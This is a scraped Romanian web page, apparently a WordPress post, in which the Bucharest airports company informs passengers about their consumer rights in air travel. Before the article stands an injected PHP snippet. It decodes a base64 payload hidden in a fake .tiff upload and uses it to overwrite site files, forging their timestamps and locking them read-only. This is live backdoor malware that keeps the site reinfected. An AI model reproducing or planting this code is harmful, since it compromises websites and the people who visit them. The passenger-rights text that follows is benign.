$wp_update_file="/home/shuffles/public_html/wp-content/uploads/2023/05/0506412536.tiff"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Compania Naţională Aeroporturi Bucureşti – O noua atitudine

Compania Naţională Aeroporturi Bucureşti este partener al A.N.P.C.P.P.S.Romania -InfoCons şi suntem încredinţaţi că acest efort conjugat şi susţinut prin diferite campanii de informare şi educare nu va întârzia să dea rezultate în rândul consumatorilor. În acest cadru, ne adresăm, dumneavoastră, stimaţi pasageri. Când cumpărăm un bilet de avion toţi devenim utilizatori de servicii de transport aerian. Cu alte cuvinte, consumatori. Încheiem practic un contract cu compania aeriană pe care am ales-o pentru efectuarea călătoriei. Avem drepturi pe care este bine să le cunoaştem pentru a ne proteja de abuzuri sau servicii necorespunzătoare. Compania aeriană răspunde pentru transportul nostru şi al bagajelor noastre la destinaţie, pentru a avea la timp informaţiile necesare, pentru asistenţă în aeroport dacă zborul are întârziere sau este anulat ş.a.


Un pasager informat şi educat în spiritul respectării reciproce a drepturilor şi obligaţiilor este un consumator avizat şi putem evita surprizele neplăcute, multe dintre acestea fiind născute din lipsa de informare şi documentare. De aceea recomandăm ca înaintea unei călătorii cu avionul, dumneavoastră pasagerii, să consultaţi compania aeriană cu privire la ora de prezentare la aeroport, la numărul, dimensiunile şi greutatea bagajelor admise în cală şi în cabină, unde trebuie să ne adresăm dacă bagajele nu au ajuns la destinaţie sau nu mai sunt în integralitatea lor din momentul în care au fost preluate în responsabilitatea transportatorului aerian, unde putem depune o reclamaţie pentru a ne exprima nemulţumirea cu privire la serviciile oferite. Companiile aeriene pot fi contactate direct prin reprezentanţii din aeroporturi, fie prin intermediul paginilor web ale acestora, dezvoltate pentru a informa şi comunica cu clienţii proprii.


Compania Naţională Aeroporturi Bucureşti doreşte tuturor pasagerilor care utilizează cele două aeroporturi bucureştene – Aeroportul Internaţional Henri Coandă Bucureşti şi Aeroportul Internaţional Bucureşti Băneasa-Aurel Vlaicu – călătorii agreabile, lipsite de incidente neplăcute. Siguranţa şi nivelul de confort din aeroport sunt pentru noi o prioritate spre care îndreptăm toată grija noastră. Grija pentru dumneavoastră, dragi pasageri – esenţa însăşi a activităţii noastre.

 

Link-Drepturile pasagerilor: http://ec.europa.eu/transport/passenger-rights/ro/index.html

 

Va multumim pentru colaborare!

By o9admin